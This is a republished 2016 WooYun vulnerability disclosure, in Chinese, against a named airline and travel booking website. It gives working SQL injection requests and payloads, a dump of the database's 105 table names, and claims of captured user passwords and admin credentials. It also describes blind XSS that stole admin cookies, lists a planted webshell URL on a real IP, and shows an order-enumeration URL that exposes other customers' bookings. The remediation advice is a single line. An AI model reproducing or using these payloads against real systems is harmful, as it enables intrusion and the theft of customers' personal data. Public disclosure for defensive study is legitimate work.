八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

admin
admin
admin
139741
文章
114
评论
2017年4月19日04:10:19评论570 views字数 280阅读0分56秒阅读模式
摘要

2016-04-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-20: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(0) 关注此漏洞

缺陷编号: WooYun-2016-191726

漏洞标题: 八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

相关厂商: 八个六阳光航空旅游网

漏洞作者: 路人甲

提交时间: 2016-04-05 13:06

公开时间: 2016-05-20 13:10

漏洞类型: 用户资料大量泄漏

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 敏感接口未加权限认证 用户敏感信息泄漏 用户敏感数据泄漏 住址身份证姓名等敏感信息

0人收藏

漏洞详情

披露状态:

2016-04-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

漏洞小集合

详细说明:

一 :

先贴出用户量:18W+

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

0x1:先来两枚SQL注入漏洞:

----------------------------------------------------------------------------------------

code 区域 
POST /ajax/querySpeTicket4Date.action HTTP/1.1
 Host: www.66666666.com
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
 Accept: application/json, text/javascript, */*
 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://www.66666666.com/speTic4Recently.action?depCode=CGO&reaCode=LHW&flightDate=2016-03-30
 Content-Length: 23
 Cookie: JSESSIONID=460F770E422FAB60C7D2A787FE81757D; Hm_lvt_f5e3bd8d027c1dcf84d56a9886d322db=1459252966; Hm_lpvt_f5e3bd8d027c1dcf84d56a9886d322db=1459253581; Hm_lvt_eb39dfed1031da9fa5752da0eb74b1da=1459252966; Hm_lpvt_eb39dfed1031da9fa5752da0eb74b1da=1459253581; depCode=CGO; depCity=%E9%83%91%E5%B7%9E
 Connection: keep-alive
 
 depCode=CGO21257723'%20or%20'4816'%3d'4816&reaCode=LHW

参数:depCode存在注入点

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

--------------------------------------------------------------------------------------

0x2:第二枚注入:

http://www.66666666.com//sbnapp/member/member!coupon.action?pt=ios&userId=woyun' or '1'='1

正常情况下是没有任何有优惠券的:

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

带入语句满满的全是爱:

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

带入时间延时语句成功执行:

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

code 区域 
Database: ah7q89up
 [105 tables]
 +----------------------+
 | c_cou_ext            |
 | c_coupon             |
 | c_type               |
 | c_type_ext           |
 | h_area               |
 | h_brand              |
 | h_data               |
 | h_geo                |
 | h_geo_extra          |
 | h_hotel              |
 | h_hotel_id           |
 | h_hotel_imgs         |
 | h_hotel_lack         |
 | h_hotel_list         |
 | h_hotel_log          |
 | h_hotel_member_list  |
 | h_hotel_rooms        |
 | h_o_i_recipient      |
 | h_order              |
 | h_order_card         |
 | h_order_contact      |
 | h_order_customer     |
 | h_order_invoice      |
 | l_area               |
 | l_lines              |
 | l_lines_arrcity      |
 | l_lines_collections  |
 | l_lines_date         |
 | l_lines_hot_city     |
 | l_lines_trip         |
 | l_order              |
 | l_order_type         |
 | t_act_goods          |
 | t_act_lottery_acount |
 | t_act_lottery_nper   |
 | t_act_lottery_order  |
 | t_act_order          |
 | t_act_order_ly       |
 | t_act_pro            |
 | t_act_pro_jfcode     |
 | t_act_pro_order      |
 | t_act_yw             |
 | t_activity           |
 | t_activity_ca        |
 | t_activity_hb        |
 | t_ad_picture         |
 | t_advice             |
 | t_airline            |
 | t_announcement       |
 | t_app_tui            |
 | t_app_tui_act1       |
 | t_area               |
 | t_authority          |
 | t_cabin_close        |
 | t_city_airport       |
 | t_credentials        |
 | t_flight_cabin       |
 | t_flight_trans       |
 | t_giftcart           |
 | t_giftorder          |
 | t_giftorder_detail   |
 | t_groupticket_apply  |
 | t_iata               |
 | t_lottery            |
 | t_member             |
 | t_message            |
 | t_name_list          |
 | t_orderflight        |
 | t_pay_mess           |
 | t_pro_appraise       |
 | t_pro_picture        |
 | t_procount           |
 | t_product            |
 | t_pun_rate           |
 | t_que_answer         |
 | t_question           |
 | t_restdata           |
 | t_role               |
 | t_role_authority     |
 | t_sort               |
 | t_specity            |
 | t_speflight          |
 | t_speticket          |
 | t_sys_log            |
 | t_ticket_remind      |
 | t_ticketorder        |
 | t_ticketperson       |
 | t_user               |
 | t_user_address       |
 | t_user_answer        |
 | t_user_coupon        |
 | t_user_ext           |
 | t_user_ggk           |
 | t_user_lottery       |
 | t_user_role          |
 | t_user_wx            |
 | t_version            |
 | t_visa               |
 | t_visa_area          |
 | t_visa_order         |
 | t_visa_order_type    |
 | t_visa_type          |
 | t_visit_log          |
 | t_visitor_his_log    |
 | t_visitor_log        |
 +----------------------+

贴出站内部分用户的账户密码:

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

后台管理员账户信息:

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

漏洞证明:

二 : 也是个高危漏洞,盲打后台前端插入语句:

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

返回COOKIE见图:

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

现在管理员COOKIE,账户密码都有了,想怎么进就怎么进,后台地址:

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

各种订单,酒店订单,飞机订单,旅游订单,上万数据订单信息及用户敏感信息:

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

上传处校验不严,只是对后缀名与文件头部特征码进行校验,制造一个图片马截断改后缀即可:

寻找getshell方法,不知道什么原因马总是出现解析错误,遇到过很多次未能解决

code 区域 
http://116.255.199.103/sbn/pic/resources/giftPictures/ma.jsp

--------------------------------------------------------------------------------------

三:越权问题,可查看任意用户订单信息很多处,酒店订单,旅游订单,机票订单,不再一一说明,指出一处见下图:

code 区域 
http://www.66666666.com/sbnapp/travel/travel!getOrderDetail.action?id=280

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

遍历一下ID可查看订单信息:

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

八个六阳光航空旅游网几处风险泄露用户个人信息/个人登录密码/订单信息(影响10W+用户数据)

修复方案:

过滤防范SQL注入与XSS,权限验证防止越权漏洞。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:20 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin